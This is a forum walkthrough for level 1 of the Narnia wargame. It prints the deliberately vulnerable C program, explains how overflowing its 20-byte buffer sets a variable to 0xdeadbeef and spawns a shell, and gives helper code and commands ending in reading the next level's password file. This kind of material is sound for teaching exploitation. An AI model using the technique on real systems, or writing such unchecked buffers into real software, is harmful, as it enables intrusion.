TheTAZZone - Internet Chaos

Intruded.net – Narnia – Level1 Solution

ORIGINALLY POSTED BY OUTERLIMIT FOR THETAZZONE/TAZFORUM HERE

Do not use, republish, in whole or in part, without the consent of the Author. TheTAZZone policy is that Authors retain the rights to the work they submit and/or post…we do not sell, publish, transmit, or have the right to give permission for such…TheTAZZone merely retains the right to use, retain, and publish submitted work within it’s Network

[img]http://www.tazforum.com/images/TAZBANNERabc.gif[/img]

This is related to the wargames Harry posted…
It is for the server narnia. http://www.intruded.net/narnia.html
The objective on this box is to look at the source code to the program for the level you are on, and find a way to exploit or accomplish what it asks.

This is my solution and explanation of level1.

Once you login:
cd /wargame

The program you are trying to use is level1, the source code is level1.c

[code]int main(){
long val=0x41414141;
char buf[20];

printf(“Correct val’s value from 0x41414141 -> 0xdeadbeef!\n”);
printf(“Here is your chance: “);
scanf(“%24s”,&buf);

printf(“buf: %s\n”,buf);
printf(“val: 0x%08x\n”,val);

if(val==0xdeadbeef){
seteuid(1002);
system(“/bin/sh”);
} else {
printf(“WAY OFF!!!!\n”);
exit(1);
}

return 0;
}[/code]

Looking at this code, they want you to change vals value from 0x41414141 to 0xdeadbeef.
Also if you notice, it prompts you for input and stores it into the variable buf. And then prints out val…
The variable buf is declared as an array with 20 elements, and since there is nothing checking the size of the input, it allows for a buffer overflow.

You can play around with this by entering inputs of varying lengths.
You should notice that anything less than 20 characters does not effect the value of val, but if you input something more than 20 characters, the value of val changes.

This is how you are going to accomplish changing the value to 0xdeadbeef.

You can figure out how what you enter effects the value by entering in 000000000000000000000 (21 0’s).
Your output becomes 0x41410030
By inputting 20 0’s followed by a single different character you can see how the value changes.
Closer inspection shows that the last two digits is the ascii value of the key you entered.

So basically what you have to do is enter in 20 0’s, and then whatever makes ascii values you need…
If you look at an ascii table, these are not standard letters on your keyboard… Some of them aren’t even documented.

So what I did was wrote a C++ program to print out each character for me…
[code]#include
using namespace std;

int main(int argc, char* argv[])
{
unsigned long target = 0xdeadbeef;
char *p = (char *) ⌖
for (int i = 0; i < 4; i++) {
cout << p[i];
}
return 0;
}[/code]

This program will print out the characters you need to use after the 20 0’s in order to pass the level and replace val with 0xdeadbeef.

In order to get the 4 characters we need, we use a char pointer. A char is stored as 1 byte in memory. 0xdeadbeef is 4 stored as 4 consecutive bytes.
We need the char pointer to point to the first byte of 0xdeadbeef.
This is done by setting our pointer equal to the address of target…
[code] char *p = &target;[/code]
However, the compiler does not like that because target is a long integer, not a character.
So we must type cast the address of target to that of a char
[code] char *p = (char *) &target;
Now, p points to the beginning of target… we know that it is 4 bytes long, so we need to print 4 characters.
C++ will let you use a pointer as an array, each next element of the array increases the address it points to by the size of the pointer.
In the case of a char pointer, it increments by 1 byte each time.

So following the for loop we will print p[0], p[1], p[2], p[3].
Those are the 4 characters needed in the first program to set val equal to 0xdeadbeef.

In order to run the program you can do this:
Copy the code
type this: cat > /tmp/lvl1.cpp
Paste the code
Press cntrl D
type this: g++ -o /tmp/lvl1 /tmp/lvl1.cpp
chmod +x /tmp/lvl1
/tmp/lvl1

Now copy the 4 characters

then run /wargame/level1
type in 20 0’s, and paste those characters.

Now you should have a new shell as level2
cat /home/level2/.passwd

Continue on to level2

Good luck!

2 Responses to Intruded.net – Narnia – Level1 Solution

  1. Pingback: Bookmarks about Level1

  2. yahhh December 26, 2008 at 12:11 am

    I just had a go at this wargame. My solution is a little different:

    ( to see writ3r’s comment go to the tutorial: http://tazforum.thetazzone.com/viewtopic.php?f=28&t=10875&p=124394#p124394 )

Leave a Reply

Your email address will not be published. Required fields are marked *

Advertise

If you'd like to advertise on The Mutt ( aka TheTAZZone.com ) feel free to contact us at: administration[at]thetazzone.com

TheTAZZone is a non-commercial entity. We do not sell any products or services ourselves. Our revenue comes from advertising and donations only.

We appreciate your support! Your advertising revenue ( or donations ) helps us to continue to upgrade, improve, and offset the costs of maintaining this site.

Donations can be made through the page ' Donate '.